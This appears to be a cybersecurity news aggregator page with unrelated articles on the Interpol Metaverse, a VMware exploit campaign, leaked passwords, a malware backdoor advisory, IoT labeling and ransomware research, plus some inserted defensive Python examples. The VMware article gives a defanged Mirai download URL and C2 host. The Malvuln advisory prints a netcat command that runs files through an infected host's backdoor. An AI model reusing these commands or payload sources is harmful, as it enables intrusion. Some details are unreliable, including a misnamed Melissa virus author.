Friday, January 17, 2025

The Interpol Metaverse Was Launched to Help Fight Global Cybercrime


Last week, at the 90th Interpol General Assembly in New Delhi, The International Criminal Police Organization launched the first global police Metaverse.

The Interpol Metaverse will help law enforcement understand how crime could evolve in the virtual world and prepare for it.

Details about Interpol Metaverse

“Fully operational, the Interpol Metaverse allows registered users to tour a virtual facsimile of the Interpol General Secretariat headquarters in Lyon, France without any geographical or physical boundaries”, explains Interpol’s official statement.

The newly released tool can also be used by officers to share knowledge via their avatars and to take immersive forensic investigation and other policing training courses.

Interpol has also established an Expert Group to represent police departments’ concerns about the new virtual world.

What Crimes Await Us in the Metaverse

International Criminal Police Organization experts believe that the virtual world will be a place for crimes against children, data theft, money laundering, financial fraud, counterfeiting, ransomware, phishing, sexual assault, and harassment. As the number of users grows, the list of possible criminal offenses will grow too.

For law enforcement, some of these threats are likely to present significant challenges, because not all acts that are criminalized in the physical world are considered crimes when committed in the virtual world.


Financial crime-as-a-service in the Metaverse, such as digital money-laundering tools, is also of concern to law enforcement, as are business email compromise, CEO impersonation fraud, e-commerce scams, and investment fraud.

Although the Metaverse is now in its early stages, according to technology research firm Gartner, by 2027, 40% of large corporations will use a combination of web3 and AR in virtual world projects. And by 2026, one out of every four people will be spending at least an hour per day working, studying, shopping, and socializing virtually.

Even now, big tech companies are investing in VR headsets, software, content and environments. Beyond gaming and social networking, the Metaverse has promise for virtual conferencing in business, design and testing processes, retail and, inevitably, crime.

Suggest an edit to this article

Cybersecurity Knowledge Base

Latest Cybersecurity News

Cybersecurity Academy

Homepage

source

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.

VMware bug with 9.8 severity rating exploited to install witch’s brew of malware


Hackers have been exploiting a now-patched vulnerability in VMware Workspace ONE Access in campaigns to install various ransomware and cryptocurrency miners, a researcher at security firm Fortinet said on Thursday.

CVE-2022-22954 is a remote code-execution vulnerability in VMware Workspace ONE Access that carries a severity rating of 9.8 out of a possible 10. VMware disclosed and patched the vulnerability on April 6. Within 48 hours, hackers reverse-engineered the update and developed a working exploit that they then used to compromise servers that had yet to install the fix. VMware Workspace ONE Access helps administrators configure a suite of apps employees need in their work environments.

In August, researchers at Fortiguard Labs saw a sudden spike in exploit attempts and a major shift in tactics. Whereas before the hackers installed payloads that harvested passwords and collected other data, the new surge brought something else—specifically, ransomware known as RAR1ransom, a cryptocurrency miner known as GuardMiner, and Mirai, software that corrals Linux devices into a massive botnet for use in distributed denial-of-service attacks.

“Although the critical vulnerability CVE-2022-22954 is already patched in April, there are still multiple malware campaigns trying to exploit it,” Fortiguard Labs researcher Cara Lin wrote. Attackers, she added, were using it to inject a payload and achieve remote code execution on servers running the product.

The Mirai sample Lin saw getting installed was downloaded from http[:]//107[.]189[.]8[.]21/pedalcheta/cutie[.]x86_64 and relied on a command-and-control server at “cnc[.]goodpackets[.]cc”. Besides delivering junk traffic used in DDoSes, the sample also attempted to infect other devices by guessing the administrative password they used. After decoding strings in the code, Lin recovered the list of default and weak credentials the malware tries.


In what appears to be a separate campaign, attackers also exploited CVE-2022-22954 to download a payload from 67[.]205[.]145[.]142. The payload included seven files:

  • phpupdate.exe: XMRig Monero mining software
  • config.json: Configuration file for mining pools
  • networkmanager.exe: Executable used to scan for and spread the infection to other hosts
  • phpguard.exe: Watchdog executable that keeps the XMRig miner running
  • init.ps1: Script that maintains persistence by creating a scheduled task
  • clean.bat: Script that removes competing cryptominers from the compromised host
  • encrypt.exe: RAR1 ransomware

If RAR1ransom has never been installed before, the payload first runs the encrypt.exe executable. The file drops the legitimate WinRAR data compression executable in a temporary Windows folder. The ransomware then uses WinRAR to compress user data into password-protected archives.

The payload would then start the GuardMiner attack. GuardMiner is a cross-platform mining Trojan for the Monero currency. It has been active since 2020.

The attacks underscore the importance of installing security updates in a timely manner. Anyone who has yet to install VMware’s April 6 patch should do so at once.

Report: 4 in 5 companies have experienced a cloud security incident


New research from cybersecurity company, Venafi, found that 81% of companies report that they have suffered a security incident in the cloud over the last year. And almost half (45%) report that their organization experienced at least four incidents.

The research set out to highlight the increased operational risk created as companies migrate more of their applications to the cloud, driven by the complexity of cloud-native environments.

In fact, Venafi also found that companies currently host 41% of their applications on the cloud. That percentage is expected to rise to 57% throughout the next 18 months. As it rises, the need for robust cloud security will rise too.

Venafi’s research found that a majority feel cloud-based application security should be a shared responsibility between teams. Source: Venafi

With the complexity created by the cloud, machine identities have become a rich hunting ground for threat actors targeting the cloud. Every workload — including Kubernetes clusters and microservices — needs an authenticated machine identity, such as a TLS certificate, to communicate securely. Security and operational risks increase dramatically if one is compromised or misconfigured.

Venafi’s research also revealed that there is no clear industry standard for which internal team is currently responsible for securing the cloud. Most commonly, this falls under the remit of enterprise security teams (25%), followed by operations teams responsible for cloud infrastructure (23%), a collaborative effort shared between multiple teams (22%), developers writing cloud applications (16%) and DevSecOps teams (10%).

There is also not a clear consensus among security decision-makers about who should be responsible for securing the cloud. Cloud infrastructure operations teams and enterprise security teams (both 24%) are among the most popular, followed by sharing responsibility across multiple teams (22%), developers writing cloud applications (16%) and DevSecOps teams (14%).

New approaches to security must make use of a control plane to embed machine identity management into developer workloads, allowing teams to protect the business without slowing production.

For its research, Venafi polled 1,101 security decision-makers at companies with over 1,000 employees. Twenty-four percent of those surveyed were at companies with more than 10,000 employees.

Read the full report from Venafi.

Top Compromised Passwords of 2022


The passwordless future has not arrived yet. Until then, we are stuck with one of the most challenging features of modern life – password management. Because so many people reuse passwords, criminals harvest as many credentials as possible to sell to other criminals to enable ransomware attacks and data theft. 

20 top compromised passwords in 2022

Rank  Password
  1   123456
  2   12345678
  3   admin
  4   a11111
  5   123456789
  6   password
  7   1234
  8   12345
  9   secret
 10   111111
 11   123
 12   1234567890
 13   Password
 14   1
 15   admin123
 16   1234567
 17   123123
 18   user
 19   P@ssw0rd
 20   root

There aren’t any surprises in the top 20 compromised passwords.

Tips for stronger passwords

Thankfully, ZeroFox does not collect only compromised plaintext passwords. Many of the credential dumps ingested into the ZeroFox platform are hashed. In an increasing number of cases, the hashes are salted and cannot be cracked, even by ZeroFox. Unfortunately, many of the unsalted hashes collected are well known and easily crackable.

To keep your passwords safe and protect your data, here are a few tips:

  • For system administrators: store user credentials using the strongest available password-hashing algorithm, and salt those hashes.
  • For users: length and uniqueness are key. Password managers, whether the built-in managers in modern browsers or commercially available options, are the best way to ensure that if one credential is compromised your whole digital life isn’t at risk.
  • For security teams: it’s wise to have a threat intelligence service continually scouring the underground economy for your employees’ and customers’ compromised credentials.
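The administrator and user tips above, worked through in code. This is an added example and not ZeroFox's code: it refuses the article's top-20 compromised passwords and short passwords, stores new passwords as salted scrypt hashes, verifies them in constant time, and shows why an unsalted MD5 of a common password is trivially recovered. The scrypt parameters, the 12-character minimum and the stored-string format are assumptions made here.

```python
import hashlib
import hmac
import os

# The 20 passwords listed in the article, used as a deny-list.
TOP_COMPROMISED_2022 = {
    "123456", "12345678", "admin", "a11111", "123456789", "password",
    "1234", "12345", "secret", "111111", "123", "1234567890", "Password",
    "1", "admin123", "1234567", "123123", "user", "P@ssw0rd", "root",
}

# Assumed policy and KDF parameters (not from the article).
MIN_LENGTH = 12
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1   # ~16 MiB per hash
SALT_LEN = 16
KEY_LEN = 32


def is_compromised(password: str) -> bool:
    """True if the password is on the article's top-20 list."""
    return password in TOP_COMPROMISED_2022


def hash_password(password: str) -> str:
    """Store a password as 'scrypt$N$r$p$salt_hex$key_hex' with a fresh random salt.

    Rejects passwords that are on the deny-list or shorter than MIN_LENGTH.
    """
    if is_compromised(password):
        raise ValueError("password appears on the compromised list")
    if len(password) < MIN_LENGTH:
        raise ValueError(f"password shorter than {MIN_LENGTH} characters")
    salt = os.urandom(SALT_LEN)
    key = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                         n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=KEY_LEN)
    return f"scrypt${SCRYPT_N}${SCRYPT_R}${SCRYPT_P}${salt.hex()}${key.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute scrypt with the stored salt and parameters; compare in constant time."""
    try:
        algo, n, r, p, salt_hex, key_hex = stored.split("$")
        if algo != "scrypt":
            return False
        expected = bytes.fromhex(key_hex)
        key = hashlib.scrypt(password.encode("utf-8"), salt=bytes.fromhex(salt_hex),
                             n=int(n), r=int(r), p=int(p), dklen=len(expected))
    except (ValueError, TypeError):
        return False
    return hmac.compare_digest(key, expected)


def audit_unsalted_md5(md5_hex: str):
    """Return the top-20 password whose plain MD5 equals md5_hex, or None.

    Illustrates the article's point: an unsalted hash of a common password is
    recovered by a single table lookup, so it offers no protection.
    """
    table = {hashlib.md5(p.encode("utf-8")).hexdigest(): p for p in TOP_COMPROMISED_2022}
    return table.get(md5_hex.lower())


if __name__ == "__main__":
    stored = hash_password("correct horse battery staple")
    print(stored)
    print(verify_password("correct horse battery staple", stored))   # True
    print(audit_unsalted_md5("e10adc3949ba59abbe56e057f20f883e"))    # 123456
```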

Backdoor.Win32.Psychward.10 MVID-2022-0651 Remote Command Execution

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source: https://malvuln.com/advisory/70c5f8d61f6ac67091c0c5860e456427.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Psychward.10
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware listens on TCP port 13013. Third-party adversaries who can reach infected systems can issue various commands made available by the backdoor.
Family: Psychward
Type: PE32
MD5: 70c5f8d61f6ac67091c0c5860e456427
Vuln ID: MVID-2022-0651
Dropped files: winvxd.exe
Disclosure: 10/22/2022


Exploit/PoC:
C:\>nc64.exe x.x.x.x 13013

psychward final, ready for action
exec "c:\Windows\system32\calc.exe"
file executed


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

White House Proposes IoT Security Labeling


The White House last week held a meeting with the private sector, tech associations and government representatives to discuss the development of a security label for IoT devices. The label would be akin to the Energy Star label, an initiative led by the Environmental Protection Agency and the U.S. Department of Energy.

The label system, initially for routers and video cameras, will be designed so that “Americans can easily recognize which devices meet the highest cybersecurity standards to protect against hacking and other cyber vulnerabilities. By developing and rolling out a common label for products that meet U.S. government standards and are tested by vetted and approved entities, we will help American consumers easily identify secure tech to bring into their homes,” the White House said last week in a document that described the event.

Home routers and video devices are often commandeered by criminals and employed in distributed denial-of-service attacks against organizations. It’s not clear yet what standards or vetting organizations are being considered. Industry reaction to the possible labeling system has been mixed but seems mostly positive.

“The ‘Energy Star’ label worries me about this one,” said Forrester VP and principal analyst Jeff Pollard. “That’s not exactly a stellar program. A yellow sticker on the thing you bought, that makes you feel better about the thing you bought … and that you notice after you bought the thing,” he said, doesn’t necessarily change the game.

John Pescatore, director of emerging security trends at the SANS Institute, pointed to prior successful government and private industry standards efforts. “There is a long history around fire resistant material standards where independent organizations like UL Labs worked with government agencies like NIST, the Association for Testing and Materials and the National Fire Protection Association to make sure that a wide variety of flammable things were much safer,” said Pescatore.

“This all succeeded because the government didn’t try to dictate standards, it worked with private industry to make sure that procurements and use of flammable “things” had to include compliance with the industry standards,” he said.

Pescatore pointed to a number of existing meaningful technology standards efforts, as well, including the Connectivity Standards Alliance-IoT which has some big names on board: Amazon, Apple, Google and Samsung, among others.

“If the U.S. government put its buying power behind some consensus standards, the bar for IoT security will be raised,” he added. “It’s good to see elsewhere in the Biden announcement they specifically said they will be ‘strengthening the federal government’s cybersecurity requirements and raising the bar through the purchasing power of government,’” Pescatore said.

Greg Young, VP of cybersecurity at Trend Micro, agreed; he added that because IoT and home smart devices are exceptionally vulnerable, “a clear and consumer-focused label is a great idea.”

However, the devil is in the certification details, he added, and shared good and bad examples of previous efforts. “They [the government] need to remember what has been learned already or risk repeating the mistakes,” he said.

Young pointed to the NIST FIPS140-2 standard for certifying the use of cryptography as one of the greatest successes. “FIPS140-2 has a very narrow scope, four levels and a relatively speedy testing and validation process using government-certified private sector labs. Everyday devices such as the PIN pad on an ATM are certified under FIPS.”

The bad, in his view, proved to be Common Criteria. “Common Criteria was intended to provide certification for the security features in operating systems and security products and appliances. Common Criteria had too much scope creep in the goals, was complex to the level of ridiculousness, effectively allowed vendors to set their own bar for what would entail success by describing a ‘security target,’ and weighed down by documentation over testing. Common Criteria was effectively abandoned by the government and don’t think anyone misses it,” he said.

Young added that, as with all standards, maintaining the rating is an issue, especially with devices regularly patched and updated. “I’m encouraged that NIST has been flagged as a potential lead agency and I hope that they apply the blueprint of FIPS140-2 to this IoT effort,” he said. He added that, while simplistic, the analogy to the Energy Star rating is being used to emphasize the clarity required.

“I’m concerned, however, because the nature of IoT can be exceptionally broad and the scope of what is to be included can easily expand, and opinions can differ about what is important for IoT to be secure,” he continued. “Consumers need help in protecting themselves from the cybersecurity risks of IoT. This effort can be entirely successful, but the discipline required is exceptionally great in order to minimize the bureaucracy, maintain the scope, deliver speedy testing and make sense of how to maintain certifications in the face of easily changed product software,” he concluded.

Diana Kelley, chief strategy officer and chief security officer at Cybrize, said the time is long overdue for a way to provide consumers and enterprises with a reliable, normalized indicator of the security level of products and services, but warns that users can’t expect to displace their own security efforts with the arrival of a security label.

“The trick, of course, is to ensure the benchmarks being used are the right ones—and that buyers don’t lose sight of the fact that security in practice depends on both the relative security of the device and also how it’s used. The ‘safest’ car in the world still isn’t safe if the driver is unable to drive it safely,” she said.

Wholesale giant METRO confirmed to have suffered a cyberattack


International cash and carry giant METRO was hit by a cyberattack that caused IT infrastructure outages. METRO employs more than 95,000 people in 681 stores worldwide, most of them in Germany; its sales reached 24.8 billion euros in 2020.

The outages impacted stores worldwide. The company confirmed the cyberattack in an official statement and is investigating the incident with the help of external experts:

“METRO/MAKRO is currently experiencing a partial IT infrastructure outage for several technical services. METRO’s IT team, together with external experts, immediately launched a thorough investigation to determine the cause of the service disruption. The latest results of the analysis confirm a cyber attack on METRO systems as the cause of the IT infrastructure outage.” reads the statement issued by the company.

The wholesale giant notified relevant authorities and warned customers that delays might occur due to service disruptions.

In response to the outage, the teams in the stores set up offline systems to process payments.

The company did not provide technical details about the attack, but the problems faced by Metro suggest it was the victim of a ransomware attack.

5 Of The Biggest Global Cyberattacks in History


Being locked out of your laptop until you pay a ransom and having your social media accounts stolen are just two examples of hacking. However, when such hacking attempts move beyond a single person to an entire enterprise, it becomes a cyberattack. As you can imagine, a lot of damage can happen from a cyberattack due to the number of people affected. In this article, we explore the biggest global cyberattacks to give you an idea of how dangerous cyberattacks can be and why it’s important to take our online security as seriously as our physical one. This is one article you’ll want to read until the end.

The Biggest Global Cyberattacks in History

Cyberattacks have been on the rise recently, with the average cost of a data breach of $1.4 million. This makes one wonder if corporations should be spending more money on their cybersecurity. However, as we’ll see in this article, these 5 global cyberattacks cost much more.

SolarWinds cyberattack

Many multinational companies use SolarWinds’ Orion software to simplify their IT administration of on-premises and hybrid systems. However, in 2020, SolarWinds was hacked, exposing their clients, including government agencies, to hackers. Malicious code was included in one of SolarWinds’ Orion updates, and that’s how it spread to 18,000 of their customers’ systems.

The hackers first gained access to the SolarWinds system in September 2019, but the hack was discovered in December 2020. One of the many cybersecurity tips for students is frequently checking their systems for malicious code. However, the hackers planned the SolarWinds cyberattack very effectively, as their code mimicked normal network traffic.

The Melissa Virus

The year was 1999, and despite the internet being just 16 years old and most hard drives having capacities under 1 gigabyte, Daniel Lee Smith was still able to take advantage of the technology of the day to launch a cyberattack called the Melissa Virus. It was an email virus that particularly targeted Microsoft Word and Microsoft Outlook. This cyberattack was one of the first and biggest of them all. It affected many companies, including Microsoft. It’s estimated that it cost $80 million to repair all the affected systems.

Cyberattacks on Estonia

Modern warfare today has gone beyond physical fighting to cyberattacks. Most advanced nations rely heavily on IoT devices and the internet, which puts these systems in danger. Moreover, governments today understand that you can destroy or at least weaken your enemies if you manage to cripple their communications, and this was the case for Estonia in 2007. After a controversial decision to move a memorial, certain elements against it launched an attack on Estonia’s communication systems, thus affecting its economy and other related state infrastructure.

The events that followed made life very difficult for Estonia’s citizens. Many studies and research have been done to investigate the people involved in the attack. If you need to find some source material on this event, you may need a translation from the Estonian language.

Ukraine power grid attack

Following the unlawful annexation of Crimea by Russia, Ukrainians were faced with another problem: their power grid was attacked. The Sandworm group, the Russian cyber military unit, allegedly carried out this cyberattack. It’s also considered the first successful cyberattack on a power grid. In the end, it’s estimated that the attack affected anywhere between 200 and 300 thousand Ukrainians.

Colonial Pipeline Company ransomware attack

In 2021, the American company Colonial Pipeline suffered a ransomware attack. This cyberattack was so severe that the company had to shut down the largest fuel pipeline in America for several days, and all it took was one compromised password. Because it was losing money every day the pipeline was down, the company later agreed to pay the hackers $4.4 million worth of bitcoin.


In Conclusion

Cybersecurity is something we should all take seriously. In some cases, you might only have your social media account hacked. However, as shown in this article, you might suffer immense financial and physical harm from a cybersecurity attack. Hopefully, this article was of great help to you and answered some questions regarding the importance of cybersecurity.

Author’s Bio

Carl Hill is a cybersecurity expert and freelance writer. His day job requires him to ensure that those he works with are well-informed on potential cybersecurity threats and know how to handle them. Carl loves his job as it allows him to be helpful to others. With that same mindset, Carl decided to start writing helpful content for his audience.

How to Run Threat Intelligence Analysis and Malware Research (Without Spending a Dime)


In this post, I will walk you step-by-step through techniques that will enable you to run threat intelligence analysis and research malware without spending a dime. 

Chapter Zero – Triggering My Inner Threat Intelligence Analyst and Malware Researcher Ego 

I recently saw a blog post by Trend Micro in the Curated Intelligence Discord group. The blog post describes a rather interesting ransomware incident discovered by Trend Micro, in which, yet again, a legitimate driver was utilized to terminate security-related processes from the kernel space. I was curious, so I looked into the IoC index. 

I decided to look up the IoCs in VirusTotal, but, unfortunately, the only hash listed in the VT database (at the time of writing) was the driver mhyprot2.sys.

As I am lucky enough to have access to a premium VTI account and was determined to provide the juicy hashes to my community, I started researching. 

Quickly, I found more campaigns from the same ransomware actor as well as the tools and ransomware associated with the Trend Micro report. Even as I stroked my bloated ego (after all, I had just found all those missing hashes), I remembered the days when I was starting out with malware research and begging for samples.

And so, I decided to challenge myself to find and download all the missing samples and attempt to attribute the ransomware actor using just OSINT and free tools. 

Let’s dive in. 

Chapter One – Finding the Malware Samples 

I first looked up the driver mhyprot2.sys hash (0466E90BF0E83B776CA8716E01D35A8A2E5F96D3) in a VirusTotal Community account and selected the relations tab (I avoided the community tab, as the collections and comments were not at all helpful in this case).

As it is a legitimate gaming driver, it has a lot of execution parents, and the drop-down list of execution parents is crazy long. However, we do have some clues to search for. From the report, we know that avg.msi and avg.exe are responsible for dropping the driver onto the disk: 

I decided to keep dropping more files within the execution parents list, and, what do you know?!

Interesting… Let’s see what this hash is about. I clicked the (MD5: b6373b520a21c2e354b805d85a45a92d) file name and hit the jackpot!

Two files were missing: the ransomware file itself, called svchost.exe, and logon.bat. The first was quite easy to find. Just by clicking the dropped files within the MSI, I found that VirusTotal displayed a misleading name for the ransomware file. Clicking on the 6th file (with the long hash name) got me transferred to the following sample (5143bbdf1f53248c7743f8634c0ddbc).

Great! Now for the missing batch file and the ransomware note. The only way I could think of is to trigger the MSI installation on a sandbox like AnyRun. In theory, not only would I gain access to all the files, as AnyRun allows anyone who pleases to download files from their reports, but I would also gain access to the logon.bat file and the ransomware note, which could aid in attribution. 

Chapter Two – Downloading the Malware Samples 

Back in the day, I used open malware repositories or begged my researcher friends to use their VTI access and download samples for me. The latter will obviously hurt our fragile ego, so let’s start looking up avg.exe and avg.msi in open malware repositories. 

I searched the hashes in AnyRun, Malshare, Malware Bazaar, and Google. Finally, I hit the jackpot with Hybrid Analysis, which allows registered users to download samples!

The next step was to download the file and trigger an execution on AnyRun, which should provide easy access to all the samples within this ransomware campaign. 

Once I got my hands on the avg.msi sample, I ran it on AnyRun. There’s quite a nifty trick in AnyRun that I only discovered when I laid my hands on a premium account. It is possible to increase the machine run time by clicking the button Add Time at the top right. For a free account, it increases the run time from 1 minute to 5 minutes, which changes quite a bit.

Anyway, I ran the sample, and, what do you know?! I found the entire infection process with all the missing files! 

Here is logon.bat, which was missing in VirusTotal.

Here is the ransomware note: 

Chapter Three – The Malware Attribution Process 

Sadly, this chapter will be quite short.  

Spoilers! I couldn’t find the actor responsible for this ransomware. 

I first tried to upload the ransomware note to ID Ransomware, which can attribute ransomware notes to ransomware actors by just uploading the ransomware note. ID Ransomware claimed that this ransomware note belonged to Nemucod. 

Yet, I was doubtful. So I uploaded the ransomware file svchost.exe (since, by then, it was on AnyRun, I could download it for free) to Intezer, which offers a community account version. Intezer attempts to attribute files to malware and malicious actors by code “genes.”

That also wasn’t very helpful. Well… I did my best, right?

See you guys next time! 

Thanks to @1ZRR4H, who took a good look at the ransomware note and saw that the TOX-ID in the ransom note is the same one found in Rever Ransomware notes. A simple Google search of the TOX-ID confirms it:

@Amigo_A_ has written about Rever ransomware. Read more about Rever Ransomware here.
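The pivot that finally worked here was a contact identifier shared between ransom notes. The script below is an added example, not part of the original post and not a tool used by its author: it pulls candidate Tox IDs out of a note (a Tox ID is 76 hex characters: a 32-byte public key, a 4-byte nospam value and a 2-byte checksum that is the XOR of the first 36 bytes folded into two bytes), discards strings that fail the checksum so SHA-256 hashes and random hex are not mistaken for contacts, and matches survivors against an index of IDs seen in notes from known families. The note text, the Tox IDs and the family names are all constructed placeholders; the only real value is the mhyprot2.sys SHA-1 from Chapter One, included to show that a 40-hex hash is not picked up.

```python
import re
from typing import Dict, List

# A Tox ID is 38 bytes printed as 76 hex characters:
#   32-byte public key + 4-byte nospam + 2-byte checksum.
# The checksum is the XOR of the first 36 bytes folded into two bytes
# (byte i contributes to checksum[i % 2]).
TOX_ID_RE = re.compile(r"(?<![0-9A-Fa-f])[0-9A-Fa-f]{76}(?![0-9A-Fa-f])")


def tox_checksum_ok(tox_id: str) -> bool:
    """True if the 76-hex string carries a valid Tox address checksum."""
    try:
        raw = bytes.fromhex(tox_id)
    except ValueError:
        return False
    if len(raw) != 38:
        return False
    chk = [0, 0]
    for i, b in enumerate(raw[:36]):
        chk[i % 2] ^= b
    return bytes(chk) == raw[36:]


def extract_tox_ids(text: str) -> List[str]:
    """Checksum-valid Tox IDs found in a note, upper-cased and de-duplicated in order of appearance."""
    found: List[str] = []
    for m in TOX_ID_RE.finditer(text):
        cand = m.group(0).upper()
        if tox_checksum_ok(cand) and cand not in found:
            found.append(cand)
    return found


def make_placeholder_tox_id(body: bytes) -> str:
    """Build a syntactically valid Tox ID from a 36-byte placeholder body (constructed, not a real contact)."""
    assert len(body) == 36
    chk = [0, 0]
    for i, b in enumerate(body):
        chk[i % 2] ^= b
    return (body + bytes(chk)).hex().upper()


def attribute_by_tox_id(note: str, known: Dict[str, List[str]]) -> List[str]:
    """Names of known families whose indexed notes share at least one Tox ID with this note."""
    ids = set(extract_tox_ids(note))
    return sorted(
        name for name, note_ids in known.items()
        if ids.intersection(i.upper() for i in note_ids)
    )


# Constructed sample data: a fake ransom note and a fake index of known-family notes.
PLACEHOLDER_ID_A = make_placeholder_tox_id(bytes([0x11] * 36))
PLACEHOLDER_ID_B = make_placeholder_tox_id(bytes(range(36)))

SAMPLE_NOTE = (
    "ALL YOUR FILES HAVE BEEN ENCRYPTED\n"
    "Contact us via TOX: " + PLACEHOLDER_ID_A + "\n"
    # the real mhyprot2.sys SHA-1 from the post; 40 hex chars must not be treated as a Tox ID
    "Reference: 0466E90BF0E83B776CA8716E01D35A8A2E5F96D3\n"
)

KNOWN_NOTES: Dict[str, List[str]] = {
    "family-A (constructed)": [PLACEHOLDER_ID_A],
    "family-B (constructed)": [PLACEHOLDER_ID_B],
}

if __name__ == "__main__":
    print("Tox IDs in note:", extract_tox_ids(SAMPLE_NOTE))
    print("Matching families:", attribute_by_tox_id(SAMPLE_NOTE, KNOWN_NOTES))
```

The checksum test matters more than it looks: a ransom note full of hashes, wallet addresses and session keys yields plenty of long hex strings, and only the ones that validate as Tox addresses are worth putting into a search engine or a note index.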

Chapter Four – IoC appendix 

  • AVG.MSI – b6373b520a21c2e354b805d85a45a92d
  • AVG.exe – 44961feb7fd9eeabdb67e5eeb15b9c8a
  • HelpPane.exe – d33dac29513dcc1027f29d5e9e901369
  • Svchost.exe – 5143bbdf1f53248c7743f8634c0ddbc1
  • Logon.bat – 160b427081688e677d0136a42dddc2d9
  • Mhyprot2.sys – 4b817d0e7714b9d43db43ae4a22a161e
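Before an appendix like this is pasted into VirusTotal, a sandbox search or a blocklist, it pays to check that every value is actually a well-formed hash: the svchost.exe MD5 as printed in Chapter One is one character shorter than the one in the appendix, and a truncated hash silently returns nothing. The parser below is an added example, not the post's own tooling; it reads "name – hash" lines, classifies each value by hex length (32 MD5, 40 SHA-1, 64 SHA-256), flags anything that is not a valid hash, and produces a lowercased lookup set. The sample input is the appendix above plus the SHA-1 and the shortened MD5 from Chapter One; the two extra row labels are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Hash algorithm implied by hex length; anything else is not something we can pivot on.
HASH_TYPES = {32: "md5", 40: "sha1", 64: "sha256"}
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")
# Accepts "name – hash", "name - hash" and "name: hash"; the value must be the last token.
LINE_RE = re.compile(r"^(?P<name>.+?)\s*[–\-:]\s*(?P<value>\S+)\s*$")


@dataclass
class IocEntry:
    name: str
    value: str            # normalised to lowercase hex
    kind: Optional[str]   # "md5" / "sha1" / "sha256", or None if malformed


def classify_hash(value: str) -> Optional[str]:
    """Hash algorithm implied by the string's length, or None if it is not valid hex of a known length."""
    value = value.strip()
    if not HEX_RE.match(value):
        return None
    return HASH_TYPES.get(len(value))


def parse_ioc_appendix(text: str) -> List[IocEntry]:
    """Parse one IoC per line; lines that do not look like 'name – value' are skipped."""
    entries: List[IocEntry] = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        value = m.group("value")
        entries.append(IocEntry(m.group("name").strip(), value.lower(), classify_hash(value)))
    return entries


def malformed(entries: List[IocEntry]) -> List[IocEntry]:
    """Entries whose value is not a usable hash (wrong length or non-hex), to be fixed before any lookup."""
    return [e for e in entries if e.kind is None]


def lookup_set(entries: List[IocEntry]) -> Set[str]:
    """De-duplicated, lowercase set of valid hashes ready for a bulk search or blocklist."""
    return {e.value for e in entries if e.kind is not None}


# Sample input: the post's appendix, plus the SHA-1 and the shortened MD5 quoted in Chapter One
# (the last two row labels are constructed for this example).
IOC_APPENDIX = """
AVG.MSI – b6373b520a21c2e354b805d85a45a92d
AVG.exe – 44961feb7fd9eeabdb67e5eeb15b9c8a
HelpPane.exe – d33dac29513dcc1027f29d5e9e901369
Svchost.exe – 5143bbdf1f53248c7743f8634c0ddbc1
Logon.bat – 160b427081688e677d0136a42dddc2d9
Mhyprot2.sys – 4b817d0e7714b9d43db43ae4a22a161e
Mhyprot2.sys SHA1 – 0466E90BF0E83B776CA8716E01D35A8A2E5F96D3
Svchost.exe as printed in Chapter One – 5143bbdf1f53248c7743f8634c0ddbc
"""

if __name__ == "__main__":
    parsed = parse_ioc_appendix(IOC_APPENDIX)
    for e in parsed:
        print(f"{e.kind or 'INVALID':8} {e.value}  {e.name}")
    print("usable hashes:", len(lookup_set(parsed)))
    print("needs attention:", [e.name for e in malformed(parsed)])
```

Running it lists the six MD5s and the SHA-1 as usable and reports the 31-character svchost.exe value as needing attention, which is exactly the kind of copy-paste defect that turns a "no results" search into a false negative.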

 


Hacker Who Stole Ed Sheeran Songs Jailed


A hacker who stole two unreleased songs from Ed Sheeran and sold them on the dark web has been jailed for 18 months.

Adrian Kwiatkowski traded the music by Sheeran and 12 songs by rapper Lil Uzi Vert in exchange for cryptocurrency, BBC News reports.

The 23-year-old, from Ipswich, managed to get hold of them after hacking the performers’ digital accounts, the Crown Prosecution Service said.

Kwiatkowski admitted 19 charges, including copyright infringement and possessing criminal property.

He had made £131,000 from the music, City of London Police said.

Ipswich Crown Court heard that when the defendant’s Apple Mac laptop was searched, 565 audio files, including the songs by Sheeran and Vert, were uncovered.

Spirdark alias

An investigation was initially launched by US authorities in 2019.

It came after the management of several musicians reported to the New York District Attorney that someone known online as Spirdark had hacked a number of accounts and was selling the content.

The investigation linked the email address used to set up Spirdark’s cryptocurrency account to Kwiatkowski. His home address in the UK was also linked to an IP address used to hack one of the devices.

The case was then referred to the City of London Police and Kwiatkowski was arrested in September 2019.

According to police, seven devices, including a hard drive that contained 1,263 unreleased songs by 89 artists, were seized.

A document saved on the hard drive summarised the method he had used to obtain them along with a stash of Bitcoin which was seized.

Chief crown prosecutor Joanne Jakymec said Kwiatkowski had “complete disregard” for the musicians’ creativity, hard work and lost earnings.

“He selfishly stole their music to make money for himself by selling it on the dark web,” she said.

“We will be pursuing ill-gotten gains from these proceeds of crime.”

